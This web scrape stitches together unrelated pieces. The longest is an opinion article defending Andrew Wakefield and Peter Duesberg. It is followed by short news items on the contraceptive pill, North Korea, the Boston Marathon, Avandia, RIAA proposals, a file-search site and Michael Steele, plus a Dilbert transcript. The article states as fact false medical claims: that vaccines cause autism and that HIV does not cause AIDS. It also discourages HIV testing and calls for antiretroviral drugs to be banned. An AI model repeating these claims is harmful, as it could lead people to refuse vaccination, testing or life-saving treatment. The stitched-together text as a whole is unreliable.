Two tenets of today ’s health care are that a human immunodeficiency virus ( HIV ) causes AIDS and vaccines are effective and safe .
Investigators who have the temerity to question this official dogma see their work blocked from publication , grant requests rejected , and in one signal case can even find themselves being subjected to a Soviet - style show trial .
Andrew Wakefield ( b. 1957 ) recently underwent such a trial in the UK held by its General Medical Council ( GMC ) Fitness to Practice Panel .
Along with two other well - respected gastroenterologists , he was subjected to the longest , most expensive trial in that council ’s 148 - year history .
In 1998 , Dr. Wakefield and twelve colleagues at the Royal Free Hospital in London identified a new kind of bowel disorder in twelve children with autism .
This case series of " autistic enterocolitis " was published in the Lancet .
The parents of eight of these children reported that their child became autistic and developed disabling intestinal symptoms shortly after receiving the MMR ( measles , mumps , and rubella ) vaccine .
Noting this , Dr. Wakefield and his colleagues raised the possibility that the MMR vaccine might have something to do with this syndrome .
They concluded the Lancet paper with this statement : " Further investigations are needed to examine this syndrome [ autistic enterocolitis ] and its possible relation to this [ MMR ] vaccine . "
A UK journalist , Brian Deer , “ investigated ” Dr. Wakefield and wrote an expose about him in 2004 that was published in the Sunday Times .
Acting on the allegations this journalist made , the GMC charged Dr. Wakefield with unethical conduct , various conflicts of interest , and " callous disregard " for children .
Last month , the GMC Fitness to Practice Panel , after a 2 - year trial , found him guilty of all charges .
One observer who has followed this case notes that the head of the Panel , Dr. Kumar , holds shares in GlaxoSmithKline , the UK ’s largest vaccine maker .
The charges the GMC and this journalist have made against Andrew Wakefield are all without foundation , as Melanie Phillips shows in " The Witch - Hunt Against Andrew Wakefield " in the Spectator , and Mark Blaxill , in " Naked Intimidation : The Wakefield Inquisition is Only the Tip of the Autism Iceberg , " on the AgeofAutism.com website .
Dr. Wakefield rebuts the charges made against him HERE and HERE .
Parents of autistic children support Dr. Wakefield .
After the verdict parents held street demonstrations in protest , carrying signs reading " Scape - goat , " " With Wakefield , " and " Guilty of helping our damaged kids . "
One parent said , " I firmly believe these doctors are going to be hung out to dry because they dared to question MMR . "
Another , " Dr. Wakefield and his colleagues are the only doctors who ever really listened to us .
I fear now that no doctor will want to have anything to do with helping any child that is harmed by any vaccine in the future . "
Dr. Wakefield helped found the Thoughtful House Center for Children in Austin , Texas in 2005 and was its Executive Director until recently when he stepped down from this position in the wake of the GMC trial .
Shortly after the verdict the editor of the Lancet , Richard Horton , announced that the journal was retracting Wakefield et al . ’s 1998 paper .
If you have access to the electronic archive of past issues of the Lancet , you will see the word " RETRACTED " stamped across each page of the paper , which makes it hard to read .
A clean copy of this study can be found HERE .
Elsevier owns the Lancet .
None of Dr. Wakefield ’s subsequent 32 published , peer - reviewed papers have been retracted , which include his finding vaccine - strain measles virus in the gut of autistic children , a finding that has been corroborated by other investigators .
Until now .
Perhaps the principle reason the medical - government - pharmaceutical establishment has worked so hard to trash Dr. Wakefield is this :
Along with researchers at the University of Pittsburg , University of Kentucky , and the University of Washington , Dr. Wakefield is a coauthor of a signal semi-randomized , double - blind , placebo - controlled study on the effect of Hepatitis B vaccine on newborn monkeys .
Hepatitis B vaccine was given to 13 male macaque infants ; 7 more served as controls ( receiving a saline placebo or no injection ) .
The vaccinated ones exhibited a significant delay in the acquisition of three important survival reflexes — the root reflex , where the animal turns its head in response to a brush on the cheek ; snout , opening his mouth in response to a brush on the forehead ; and the suck reflex , sucking on a nipple placed in the mouth .
This study shows that one mercury - containing birth dose of the Hepatitis B vaccine can cause significant harm .
This carefully done study carried out by highly respected , NIH - approved primatologists has explosive implications .
The editor of Neurotoxicology accepted the paper and published it online on October 2 , 2009 , " epub ahead of print , " as most medical journals now do with important studies before they appear in a printed issue of the journal months later .
But soon after Andrew Wakefield was found guilty in the GMC show trial Elsevier , the owner of Neurotoxicology , instructed its editor , Joan Carnmer , to delete the online edition of the paper and not publish it .
Reluctantly , see HERE , she did what she was told and sent the paper down the Orwellian memory hole , without any explanation given from Elsevier or the journal ’s editors .
Fortunately , 2010 has not ( yet , anyway ) become Orwell ’s 1984 , and you can access the complete study online HERE .
If you like this site , please help keep it going and growing .
This same team of researchers recently completed another primate study that followed 14 monkeys through the U.S. childhood vaccine schedule over a multi- year period .
The difference in outcome for the vaccinated monkeys versus the unvaccinated controls is said to be " both stark and devastating . "
In the statement that Jenny McCarthy and Jim Carrey made after Dr. Wakefield ’s show trial , " Andrew Wakefield , Scientific Censorship , and Fourteen Monkeys , " they say : " There is no question that the publication of the [ new fourteen ] monkey study will lend substantial credibility to the theory that over - vaccination of young children is leading to neurological damage , including autism .
The fallout from the study for vaccine makers and public health officials could be severe . "
The authors of this second primate vaccine study will have a hard time getting it published .
In " On Evidence , Medical and Legal , " Clifford Miller , an attorney in the UK ( no relation ) and I show that there is good evidence , from a legal standpoint at least , that the MMR vaccine causes autism in susceptible children ( J Am Phys Surg 2005 ; 10 ( 2):70 — 75 , available HERE )
Courts resolve disputes in civil matters with a standard of proof that is " more likely than not , " or in some cases in the U.S. , " clear and convincing . "
In criminal cases , the level of evidence required to render a guilty verdict has to be " beyond a reasonable doubt . "
Lies the Government To ... Andrew P. Napolitano Best Price : $ 0.25 Buy New $ 4.46 ( as of 12:15 EST - Details )
Evidence - based medicine seeks to attain a scientific level of proof and considers randomized controlled trials ( RCTs ) , and systematic reviews ( " meta-analyses " ) of multiple RCTs to be the highest level of evidence in medicine .
A scientific level of proof requires evidence that is " irrefutable . "
Randomized controlled trials and meta- analyses of those trials , however , are subject to sufficient bias that their level of evidence rarely is irrefutable , and sometimes does not even reach the level of " more likely than not " ( JAMA 1999 ; 28:1054 — 1060 ; BMJ 2005;330( 7497 ) :753 ) .
The only kind of medical evidence that approaches a scientific level of irrefutability is a single , well - documented case report of a challenge / de- challenge / re- challenge response to a drug or vaccine .
The pharmaceutical literature recognizes that such a response is strong evidence of causation and label it an " adverse drug reaction . "
In heart surgery we give heparin to thin the blood to reroute the patient ’s circulation through a heart - lung machine ( and not have it clot ) so oxygenated blood can keep flowing through the body when we stop the heart to repair it .
In some people this drug will destroy platelets ( specialized cells that assist in blood clotting ) .
When heparin is given to such a person ( " challenge " ) she will drop her platelet count from a normal level of 240,000 to a dangerously low 40,000 .
Over a several week period without any heparin ( " de- challenge " ) the count will recover and go back up to 200,000 .
When given another dose of heparin ( " re-challenge " ) , the platelet count promptly drops back down to 30,000 .
This single case of challenge / de- challenge / re- challenge evidence proves beyond a reasonable doubt , if not irrefutably , that heparin can cause a low platelet count ( thrombocytopenia ) in susceptible individuals .
The medical acronym for it is " HIT " — heparin - induced thrombocytopenia .
The same thing happens with the MMR vaccine and autism / autistic enterocolitis .
At age 14 — 16 months , following the CDC immunization schedule , a health practitioner challenges a normally developing child with the MMR vaccine / drug , and he quickly regresses into a state of autism with bowel dysfunction .
Over the next several years , with applied behavioral analysis and biomedical treatment , during a period of de-challenge , the boy recovers neurologically and regains normal bowel function .
Then , between the age of 4 and 6 , as per the CDC ’s schedule , he is re-challenged with a booster shot of MMR vaccine / drug and regresses , once again , into a state of autism with bowel dysfunction .
No randomized , placebo - controlled trials have ever been done to prove that vaccines , given singly or together , are safe .
Epidemiologic studies , funded mainly by vaccine makers , show that vaccines are safe .
But epidemiologic evidence , with its statistical foundation , are open to manipulation and bias .
Such evidence touting the safety of vaccines is like that obtained by tobacco companies in the epidemiologic studies they conducted in the 1940s and 1950s that showed cigarettes do not cause lung cancer .
The evidence provided by even a single MMR challenge / de- challenge / re- challenge ( CDR ) case report overshadows that provided by epidemiologic studies — and RCTs on vaccine safety , if there were any .
CDR case reports of MMR vaccine causing the adverse drug ( vaccine ) reaction of autism and autistic enterocolitis can be found HERE and HERE .
( For more on vaccines see " Vaccines : Get the Full Story : Protect your child and yourself , " available HERE . )
The Origin , Persistenc ...
Henry H. Bauer Best Price : $ 4.00 Buy New $ 35.00 ( as of 10:35 EST - Details )
An international conference questioning HIV / AIDS dogma was held in Oakland , CA last November .
Speakers included Joan Shenton , from London , UK , speaking on " Censorship in the AIDS Debate — the Success of Stifling , Muzzling and a Strategy of Silence " ; David Rasnick on " HIV Drugs Causing AIDS " ; Marco Ruggiero , from Florence , Italy , on " Religion , Politics , and AIDS in Italy " ; and Christian Fiala , from Vienna , Austria , on " AIDS in Africa — a Call for Sense not Hysteria . "
( For the full list of speakers at this conference see HERE . )
Henry Bauer , Professor Emeritus of Chemistry and Science Studies and former Dean of the College of Arts and Sciences at Virginia Tech , spoke on " [ The ] HIV / AIDS Blunder is Far from Unique in the Annals of Science and Medicine . "
Dr. Bauer has written what is perhaps the best book on this subject , titled The Origin , Persistence , and Failings of HIV / AIDS Theory ( 2007 ) .
In a clear , well - written fashion he thoroughly and convincingly refutes the HIV / AIDS theory .
Peter Duesberg ( b. 1936 ) , the leading HIV skeptic , presented a paper at this meeting titled " HIV - AIDS Hypothesis out of Touch with South African AIDS — a New Perspective . "
As a Professor of Molecular and Cell Biology at the University of California , Berkeley , Dr. Duesberg rose to fame in 1970 when he ( and co-worker Peter Vogt ) biochemically defined the first retroviral oncogene ( a gene associated with cancer ) in birds .
The NIH ( National Institutes of Health ) awarded him a long - term Outstanding Investigator Grant .
He was a candidate for the Nobel Prize and was invited to join the prestigious U.S. National Academy of Science in 1985 at the young age , for its members , of 49 .
But in 1988 Dr. Duesberg published a paper in Science titled " HIV is Not the Cause of AIDS . "
Since then he has been subjected to the punishment accorded modern - day heretics .
Among other things , the NIH and other funding agencies stopped awarding him grants .
Since 1988 , all of his grant applications have been rejected — 24 of them .
( For more on Peter Duesberg see HERE . )
This is one form of censorship investigators with new ideas confront .
In addition to vaccines and AIDS , scientists who question state - sanctioned paradigms such as cholesterol and saturated fats cause coronary artery disease , mutations in genes cause cancer , and human activity causes global warming are denied grants and silenced .
This form of censorship is widespread throughout the biomedical and climate sciences .
( See " The Government Grant System : Inhibitor of Truth and Innovation ? " in the Spring 2007 Journal of Information Ethics , available here . )
The Wisdom of Whores : ... Elizabeth Pisani Best Price : $ 6.99 Buy New $ 11.80 ( as of 02:15 EST - Details )
As with Dr. Wakefield and his colleagues ’ primate ( Hep B ) vaccine study , another journal , Medical Hypotheses , did the same thing with a paper that Peter Duesberg , et al. wrote on African AIDS .
The journal accepted the paper and put it online prior to print publication .
Elsevier also owns Medical Hypotheses .
It made this journal , over its editor ’s protests , permanently withdraw the study and send this one also down the memory hole , along with another AIDS paper that the journal had accepted and was awaiting print by Ruggiero , et al. titled “ AIDS Denialism at the Ministry of Health [ in Italy ] . ”
Bruce Charlton is the editor of Medical Hypotheses .
The practice of placing studies online ahead of print now adds a second level of censorship .
The first is peer review .
The peer - review process works primarily to enforce orthodoxy .
Experts who review and referee papers submitted to medical and scientific journals will look disapprovingly on ones that question state - sanctioned paradigms or promote new ideas of a contrarian nature .
Controversial studies that make it over this hurdle and are accepted for publication are now put online for all to see before they appear in print .
If certain factions in the medical - government - pharmaceutical establishment do n’t like what they see , they can put pressure on the owners of the journal in question and have them make its editor delete the offending study and not publish it .
Before there was " epub before print , " groundbreaking papers that made it past peer review would get into print before the establishment would know about them , as happened with Wakefield et al . ’s Lancet paper in1998 .
Not now .
The Duesberg et al .
African AIDS study is important because it discredits a widely quoted one published by Harvard researchers Chigwedere , et al. in the Journal of Acquired Immune Deficiency Syndromes ( 2008;49:410— 5 ) .
In line with the politically correct view of African AIDS , these researchers estimate that 300,000 South African deaths occurred from AIDS each year from 2000 — 2005 ; and they believe that taking anti-HIV drugs could have prevented these deaths .
These Harvard professors blame those who question the hypothesis that HIV causes AIDS , particularly South African President Thabo Mbeki and Peter Duesberg for those deaths because they did not support giving Africans anti-retroviral drugs to prevent them .
In their study , Duesberg and his coauthors show that vital statistics in South Africa report only 12,000 HIV - positive deaths occurring each year during that period — a figure 25 - times lower than that estimated by Chigwedere , et al .
The population in South Africa increased by 3 million during 2000 — 2005 , from 44.5 to 47.4 million , even though 25 — 30 % of population is HIV positive .
Likewise , before the " African HIV / AIDS epidemic " began in 1984 ( according to HIV / AIDS researchers ) , the total Sub - Saharan population doubled from 400 million in 1980 to 800 million in 2007 .
Despite the journal having erased it , you can still access this paper online HERE .
( The real cause of AIDS is four - fold : heavy - duty recreational drug use , anti-retroviral drugs , receptive anal intercourse , and malnutrition .
See HERE .
Outside of Africa , where the main cause of AIDS is malnutrition , 98 % of all AIDS cases still occur in just two groups : gay males , accounting for about two - thirds of the cases , and IV drug users , male and female , one - third . )
American Conspiracies :...
Ventura , Jesse Best Price : $ 12.83 Buy New $ 12.73 ( as of 12:55 EST - Details )
Anyone thinking about getting an HIV test should first read the brochure " The AIDS Trap " with illustrations by R. Crumb .
Rethinkingaids.com published it , available HERE .
Its opening statement reads :
A positive result on an HIV test will change your life forever .
You could lose friends , your relationships , your health insurance , your job , the custody of your kids .
Even your sanity .
We want you to know a few facts before you agree to take what ’s called an HIV test .
Facts that doctors and medical staff probably wo n’t tell you .
A positive result does not mean you are infected with a deadly virus .
It can be caused by non -health - threatening factors , although it also may be a warning that your immune system is damaged .
If you are sick you may not need medications to get well , especially not dangerous AIDS medications .
The Hepatitis B vaccine ( Lancet 2002;339:1060 ) and Flu shots ( Am J Epid 1995 ; 141:1089 — 96 ) are two of 70 things that can cause false positive HIV test results .
C. Walton Lillihei , a pioneer in heart surgery , put it this way : " For centuries there has been a fascinating yet perplexing paradox between the search for truth and new information on the one hand , and on the other , the often vigorous , sometimes ruthless opposition to the acceptance of that new information . "
He adds , " Acceptance of new ideas , new concepts , new theories , has virtually always been surrounded by opposition and controversy . "
The same thing is happening with vaccines and AIDS , as has happened throughout history , notably when Galileo said the earth rotates around the sun , in the 17th century , and Ignaz Semmelwiess , in the 19th century , showed that doctors could reduce the mortality from maternal childbirth ( puerperal ) sepsis from 20 % to less than 2 % simply by washing their hands .
Regarding Arthur Schopenhauer ’s three stages that new truths pass through , the truth HIV does not cause AIDS is ridiculed .
The truth vaccines cause autism is no longer simply being ridiculed .
This truth has moved on to the next stage .
It is being violently opposed , with character assassination , censorship , and show trials .
Withstanding such attacks , these truths then will pass into the third and final stage .
They will become accepted as self - evident .
Peter Duesberg and Andrew Wakefield are two tenacious , brave men .
They struggle against the medical - government - pharmaceutical complex ’s efforts to disenfranchise them , and they have to endure a withering barrage of ad hominem attacks .
But they do not flinch in their efforts to see truth reign , Duesberg with AIDS and Wakefield with vaccines .
One hopes that in the not too distant future both of these truths will pass through Schopenhauer ’s third stage and become accepted as self - evident .
Once fully accepted the pandemic of autism spectrum disorders and the chronic diseases that now afflict so many children — asthma , allergies , arthritis , enterocolitis , and diabetes — will abate ; and AIDS by prescription , AIDS caused by taking anti-retroviral drugs that doctors prescribe to HIV - positive people — DNA chain terminators , like AZT , and protease inhibitors — will cease .
The day will come when the CDC withdraws its childhood immunization schedule and stops recommending that vaccines be given to children under two years of age .
HIV tests will no longer be done and anti-retroviral drugs will be outlawed .
This will be real health care reform .
March 3 , 2010
The Best of Donald Miller
The Best of Donald W. Miller , Jr. , MD
Women in the UK who have ever used the oral contraceptive pill are less likely to die from any cause , including all cancers and heart disease , compared with never users , according to research published on bmj.com today .
The results show a slightly higher risk in women under 45 years old who are current or recent users of the pill .
The authors stress that the effects in younger women disappear after about 10 years .
Furthermore , the benefits in older women outweigh the smaller excess risks among younger women .
The study continues to find a higher rate of violent or accidental death among oral contraceptive users compared with never users .
The authors are unable to explain this persistent finding .
In May 1968 , the Royal College of General Practitioners ' ( RCGP ) began the RCGP Oral Contraception Study , one of the world 's largest continuing investigations into the health effects of oral contraceptives .
Early reports from the RCGP study suggested an increased risk of death among oral contraceptive users , mainly due to an excess of strokes or other vascular problems among older women or those who smoked .
Although a later report suggested that these effects disappear once the pill is stopped , at the time there were relatively few cases of different types of cancer .
These latest results , led by Professor Philip Hannaford from the University of Aberdeen , relate to the 46,000 recruited women , followed for up to nearly 40 years , creating more than a million woman - years of observation .
The results show that in the longer term , women who used oral contraception had a significantly lower rate of death from any cause , including heart disease and all cancers ( notably bowel , uterine body and ovarian cancers ) compared with never users .
This equates to 52 fewer deaths per 100,000 woman - years .
Slightly higher rates were found among younger women who had used oral contraception , with 20 more deaths per 100,000 among those younger than 30 , and four more deaths per 100,000 among 30 - 39 year olds .
But by the age of 50 , the benefits outweighed these modest risks , with 14 fewer deaths per 100,000 among 40 - 49 year olds ; 86 fewer deaths per 100,000 for 50 - 59 year olds ; 122 fewer deaths per 100,000 for 60 - 69 year olds ; and 308 fewer deaths per 100,000 for 70 + year olds .
Hannaford says : " Many women , especially those who used the first generation of oral contraceptives many years ago , are likely to be reassured by our results .
However , our findings might not reflect the experience of women using oral contraceptives today , if currently available preparations have a different risk than earlier products . "
The authors conclude that their results , derived from a relatively healthy UK study group , show that " oral contraception is not significantly associated with an increased long - term risk of death ... indeed a net benefit was apparent . "
However , they point out that " the balance of risks and benefits may vary globally , depending upon patterns of oral contraception usage and background risk of disease . "
###
North Korean man executed for calling a friend in South Korea on mobile phone
A North Korean man has been executed by firing squad for calling a friend in South Korea on his mobile phone .
The brutal communist regime , which is technically at war with South Korea , has warned its 24 million population that any contact with the nation south of its borders is a crime punishable by life in prison or death .
News of those who have been caught and punished for making contact with the south rarely leaks out - because anyone disclosing information about punishment also risks imprisonment .
North Korean leader Kim Jong - il ( C ) visits the newly - built Kumjinggang Guchang Juvenile power plant .
The country bans citizens from contacting the south
But a radio station in Seoul , South Korea , said it had learned that a man identified only as Jung has been executed after security officials raided his home and found a Chinese - manufactured mobile phone .
He was taken away and subjected to extreme torture , when he confessed that he had told a defector friend in South Korea about the harsh living conditions in the communist state .
He revealed that he had given his friend details of how people were struggling to live and had also passed on information about the price of rice .
The friend had defected to South Korea in 2001 , according to the Seoul - based Open Radio for North Korea , which has found a way of allowing individuals and private groups to broadcast to North Koreans through shortwave radio .
The station said Jung was a munitions worker living in the north east port of Hamhung .
Defected : Jung had rung a friend in South Korea on the mobile phone , which is illegal in the communist state , according to Open Radio for North Korea in Seoul
He is believed to be the first person to be shot since the capital , Pyongyang , tightened a crackdown on illegal mobile phones last month .
North Korea does allow mobile phones to be used , but they have to be registered and their range is limited to Pyongyang .
However Chinese mobile phones with pre-paid cards that make international calls possible have been distributed through the black market .
It is the owners of these phones who have been targeted by the country 's secret police .
The execution of Jung is expected to be deliberately leaked by the regime as a warning to others who own similar phones .
View Transcript
Transcript
Dogbert the Generic Manager Man says , " We need more people on the project . "
Dogbert says , " Figure it out .
Work smarter not harder .
Make a plan .
Move some things around .
Adjust priorities .
Just get it done .
Give me a status report . "
Man says , " That did nothing but make me hate you . "
Dogbert says , " I can replace you with someone who will pretend to be inspired . "
For breakfast , there are eggs , potatoes , fruit , bread , cereals , oatmeal , and sausage .
A sample lunch menu includes potato leek soup , chicken parmesan , roast sirloin , grilled vegetables , baked rigatoni , fruit salad , and various desserts .
For dinner it can be roasted turkey and herbed scrod for protein and stuffed shells for the featured pasta .
“ The menus that they ’ve requested are very , very , very starch heavy , ’’ said Steve Morin , 1st and Fresh executive chef .
“ Every single day we have a plain pasta , plain rice on the buffet and we have plain couscous .
The other challenge has been that they ’ve requested everything be health - conscious .
We ’re not cooking with very much butter .
We ’re using a lot of olive oil .
We ’re doing a lot of vinaigrettes for sauces . ’’
Coaches , agents , Marathon organizers , and dining room caterer 1st and Fresh make sure the elite runners eat well .
They work together , developing menus , delivering fresh , healthy food , and finding exotic items like the Ethiopian bread injera .
The elite athlete dining room is designed to handle all kinds of food needs .
Keflezighi supplements dining room offerings with homemade bread and honey .
The Kenyans like warm milk on hand .
The Moroccans sometimes eat couscous for breakfast .
Italian Bruna Genovese clears her system of carbohydrates before beginning to reload on bread and pasta three days before a marathon .
Japanese competitor Yurika Nakamura planned to pick up onigiri , filled rice balls , at a local restaurant for race morning .
What elite runners drink and eat during the days and hours before the Boston Marathon can affect them physically and psychologically .
Familiar foods and the usual meal - time routines make a difference .
“ You read about it and talk to other people about what they have done , ’’ said American contender Meb Keflezighi of developing a proper training diet .
“ At the same time , we ’re all different .
We ’ve got to individualize it according to what we need to keep us going . ’’
To prepare for today ’s 114th Boston Marathon , the world ’s top distance runners follow specific diets designed for peak performances .
Depending on workouts , they can expend roughly 2,500 to 4,500 calories per day .
And they must find a healthy way to replace what they burn .
So , elite athletes arrive in Boston with a variety of nutrition needs and food preferences .
No two plates look alike at the John Hancock Elite Athlete Village dining room .
Digging into a plate piled high with vegetable lasagna , Ethiopian elite marathoner Dire Tune sensed the need for an explanation .
“ Hard training , good shape , good appetite , ’’ she said through a translator .
Then , Tune nodded in the direction of defending Boston Marathon champion Deriba Merga and laughed at his food selections .
Merga salted a colorless plate of plain pasta mixed with white rice .
Sauces give him an upset stomach , so he avoids them before big competitions .
At every meal , there are what elite runners consider staples — steamed rice , warm milk , injera , and couscous .
Fred Treseler , the John Hancock Elite Athlete Village Coordinator and president of Boston - based sports event management firm TRACS , noted Kenyans dislike processed foods and easily sense the difference between fresh and frozen items .
The hiring of 1st and Fresh this year was because of its commitment to going local and organic .
But feeding international runners involves more than simply offering fresh ethnic foods .
At a recent lunch , the Moroccans passed up the couscous because they prefer it with meat and vegetable stews .
The Ethiopian contingent left the tangy , spongy injera untouched , choosing rice and pasta combinations instead .
“ The pasta and rice is light food , carbohydrates , ’’ said Ethiopian Teyba Erkesso through a translator .
“ And injera is not eaten alone .
It is eaten with different traditional foods of Ethiopia like wot [ spicy meat , fish , and vegetable stews ] .
“ Athletes who come to race do n’t eat injera because they need light food and injera is heavy , hard to digest . ’’
“ The overall goal of the foods that we have is to help the athletes feel as close to home as they can , ’’ said elite athlete menu coordinator and TRACS staff member Lisa Plesko .
“ So we have foods that they need , that they want and desire .
We also have the quantity of food they need to be comfortable . ’’
American Josh Rohatinsky offered proof of that at a recent meal .
His plate was piled high with chicken cannelloni , pasta , rice , salad , and a pair of whole wheat rolls .
There was Gatorade to wash it all down .
“ It does n’t look like it , but I eat a lot , ’’ said the super - thin Rohatinsky .
Sitting at the same table , Keflezighi jokingly asked , “ Where does it go ? ’’
By comparison , Keflezighi ’s plate of pasta and salad indicated restraint .
“ That ’s the first round , ’’ said Keflezighi , who followed up with homemade bread and honey .
While Rohatinsky aims to keep weight on , Keflezighi makes sure he does n’t overeat the week before a marathon when his workouts are less taxing .
“ Race day I try to have a lot for a meal , ’’ said Keflezighi .
“ I will have homemade bread with honey and oatmeal and banana .
Sometimes you eat three hours before the race , then you ’re going to be doing the race for another two - plus hours .
So , it ’s going to be five hours [ before you sit for a meal again ] .
I need all the energy I can get .
You do n’t want to bonk . ’’
Rohatinsky will keep it lighter , with a bagel or toast and banana .
“ A lot of people put too much emphasis on what they eat the night before and the day before , ’’ he said .
“ My rule of thumb is just not to change it up too much .
That ’s when bad stuff can happen . ’’
And therein lies the reason for catering to the elite athletes with a variety of familiar foods .
It ’s often easier for top runners to stomach unpredictability on the course than in the main course .
© Copyright 2010 Globe Newspaper Company .
More than nine out of 10 scientists who backed a drug at the centre of a safety scare had financial links to the pharmaceutical industry , a study has found .
The disclosure will renew concern about the influence of the multinational companies on patient safety , where a warning about a drug can wipe billions from their balance sheets .
Now scientists are accused of skewing the debate over one drug , Avandia , prescribed to millions of people around the world with Type 2 diabetes .
Avandia , made by the British multinational GlaxoSmithKline ( GSK ) , which helps diabetics control their blood sugar levels , was linked with an increased risk of heart attacks in research published in 2007 .
Since then debate has raged within the scientific community about whether Avandia should be withdrawn from the market .
Warnings were issued on both sides of the Atlantic but the drug is still recommended by the National Institute for Health and Clinical Excellence ( Nice ) in the UK and taken by tens of thousands of British patients .
In the US , internal Food and Drug Administration ( FDA ) documents leaked to The New York Times last month said 500 heart attacks a month could be avoided in the US if patients on Avandia were switched to a rival drug .
A separate investigation by a cross-party US Senate committee was sharply critical of GSK , saying it failed to warn patients of the heart risks earlier .
It also said GSK executives had " attempted to intimidate independent physicians " .
Avandia was one of the biggest selling drugs in the world with sales of more than $ 3bn ( £ 2 bn ) in the US alone in 2006 .
But when the FDA issued a warning following the 2007 research linking the drug with an increased risk of heart attacks , sales plunged .
Now the FDA is reviewing the drug for a second time and is due to announce its findings in July .
In an internal memo last December , Janet Woodcock , director of the FDA 's drug centre , wrote that " there are multiple conflicting opinions " about Avandia .
Despite this , no review is planned in the UK .
The latest study helps illuminate why the scientific opinions on Avandia are conflicting .
Researchers from the Mayo Clinic in Minnesota – one of the few US research organisations that does not rely on commercial sponsorship – analysed more than 200 articles published in scientific journals , including original papers , editorials and letters , which commented on the heart attack risk associated with Avandia after 2007 .
They found almost half ( 47 per cent ) of the study authors had financial conflicts of interest but almost a quarter ( 23 per cent ) did not disclose it .
They were discovered by searching other publications by the same author or on the internet .
Three authors declared no conflict of interest but did in fact have one .
More than nine out of 10 ( 94 per cent ) of the authors who had positive views about Avandia had financial links with pharmaceutical companies involved in diabetes and 87 per cent had financial links with the drug 's manufacturer , GSK .
In contrast , less than 30 per cent of those with financial links with the industry " expressed unfavourable views " of Avandia .
Those authors who were critical of Avandia safety were " largely free of identifiable conflicts of interest " , the study says .
But of 29 articles strongly recommending the rival Eli Lilly drug , Actos , as a replacement for Avandia , 25 were by authors with financial links to Lilly .
Writing in the British Medical Journal , the Mayo Clinic researchers say : " In the heat of the rosiglitazone [ Avandia ] controversy , patients and clinicians alike were exposed to many arguments on both sides of the debate .
How could interpretation of the same evidence result in disparate and impassioned positions ?
We aimed to determine whether financial conflicts of interest with pharmaceutical manufacturers could be fuelling this fire .
From our findings , it appears that the answer is yes . "
Mohammad Murad , assistant professor of medicine , who led the study , said yesterday he had been disappointed at the low rates of disclosure of financial conflicts of interest , given the clear link between them and the authors ' views .
" This thing [ the influence of financial links ] could be subconscious , " he said .
" We are not saying it is necessarily deliberate .
But the implication is that there should be better disclosure .
People [ with financial links to the companies ] should realise they are probably biased and as readers we should be aware of probable bias . "
He added : " Avandia should probably be withdrawn .
There are a lot of other options available now . "
GSK said seven trials had been completed since 2007 which had failed to show an increase in cardiovascular events linked with Avandia .
A spokesperson said : " The science shows Avandia is safe and effective when used appropriately and in accordance with the labelling .
The evidence does not establish an increased risk of heart attack .
We acted properly and responsibly in the way the clinical trial programme for Avandia was run , in marketing it , monitoring for safety and in the updates we put out .
As a company we support open and independent debate . "
The spokesperson added that in the interests of greater transparency all research payments made by the company to doctors and institutions would be disclosed from next year .
Allegations of intimidation of scientists related to a case involving a US doctor who had included inaccuracies about Avandia in presentations in 1999 which the company had tried to correct .
" We had a disagreement which was later resolved .
We think it is important to correct inaccuracies and the doctor did correct his statements .
We absolutely rebut the idea that there was intimidation or threats . "
A Diabetes UK spokesperson said : " We would not advise people to stop taking Avandia . "
Avandia : A medical breakthrough ?
The RIAA and MPAA have submitted a plan to the Office of Intellectual Property Enforcement .
It 's basically a plan that they want the government to enact , and it 's terrifying .
Advertisement
Here are some of the lovely things that they 're calling for :
* spyware on your computer that detects and deletes infringing materials ;
* mandatory censorware on all Internet connections to interdict transfers of infringing material ;
* border searches of personal media players , laptops and thumb - drives ;
* international bullying to force other countries to implement the same policies ;
* and free copyright enforcement provided by Fed cops and agencies ( including the Department of Homeland Security ! ) .
Advertisement
Uh , yeah .
So we 'd basically give up all of our privacy so the government could play copyright cops for the RIAA and MPAA .
This is crazy stuff , and one 's got to assume that it 's so crazy that the government would never listen to it .
But good lord .
[ EFF via Boing Boing ]
Pablo Soto , the 30 year - old brain behind the file - sharing applications Blubster , Piolet and Manolito is being sued by the Spanish RIAA , but that has n't stopped him from launching another P2P venture .
This week his company launched the media search engine FooFind , allowing users to search the web for torrents , Ed2 k links and more .
In 2008 , under the umbrella of the local RIAA , Warner Music , Universal Music , EMI and Sony filed a lawsuit against Pablo ’s company , MP2P Technologies .
The labels argued that they lost a substantial amount of revenue because of the software he created , and are demanding a massive 13 million euros ( $ 17.5 m ) from the Spaniard .
The case is still ongoing , but Pablo is undeterred and has launched a new file - sharing related project this week .
His latest invention is a media search engine that enables users to find millions of media files online .
The site , named Foofind , scours the web for torrent , Ed2k , Gnutella , FTP and HTTP links pointing to all kinds of media .
At the time of publication the site is already indexing more than 10 million files and this number is growing rapidly .
The idea behind the site is simple according to Pablo .
“ The internet is not just the hypertext available in the world wide web , ” he told Torrent Freak .
“ Content has many other media formats and is available on many other networks .
So why not index it all ? ”
Pablo discussed the project with his legal advisers and he is confident that it operates within the boundaries of the law .
All users get to see when they go to the site is a big search box and none of the files ( or links to files ) are actually hosted on Foofind ’s servers .
“ We are being extremely respectful of our laws – even the president of the Spanish RIAA just said that there is n’t an infraction on Foofind .
Still , they will probably file a lawsuit , just because they can .
But we do n’t expect real troubles , as we know that it is absolutely legal . ”
Pablo and his team are currently focused on expanding the site in terms of content , hoping to make it the largest specialized media search engine on the Internet .
“ We are working hard to make it crawl and index more and more files from more and more networks , so we ’ll see Foofind growing to huge proportions in terms of results available , ” Pablo said .
Foofind might be an example of what many other torrent and file - sharing related search engines will look like in the future .
IsoHunt has already made a step in the same direction with the release of isoHunt ‘ lite ’ and others are considering taking similar steps to avoid legal trouble .
Foofind is available in English and Spanish and the source code of the website has been released under a GPL v3 license .
The elevated carbon dioxide concentrations and increasing temperatures associated with climate change will have substantial impacts on plant - insect interactions , integrated pest management programs and the movement of nonnative insect species into California .
Natural ecosystems will also be affected by the expected changes in insect diversity .
Many insects will alter how much they eat in response to changing plant nutrition .
Also , we can expect increased problems with many pest insects as they develop more rapidly in response to rising temperatures .
If we hope to maintain sustainable agro-ecosystems and preserve native species in our natural ecosystems , we need to begin preparing now for the challenges of our changing environment .
By all accounts , Michael Steele ’s tenure as the head of the Republican Party has been a dismal failure .
During his first few weeks in office , Steele heavily criticized Rush Limbaugh and his ilk , only to be thoroughly throttled by his partymates , followed by a lavish ass - kissing of Rush on the GOP chair ’s part .
Emasculated , Steele has never quite recovered .
Now , there ’s this bondage club scandal .
Some are calling for his resignation .
Others , like Newt Gingrich , are standing by Steele .
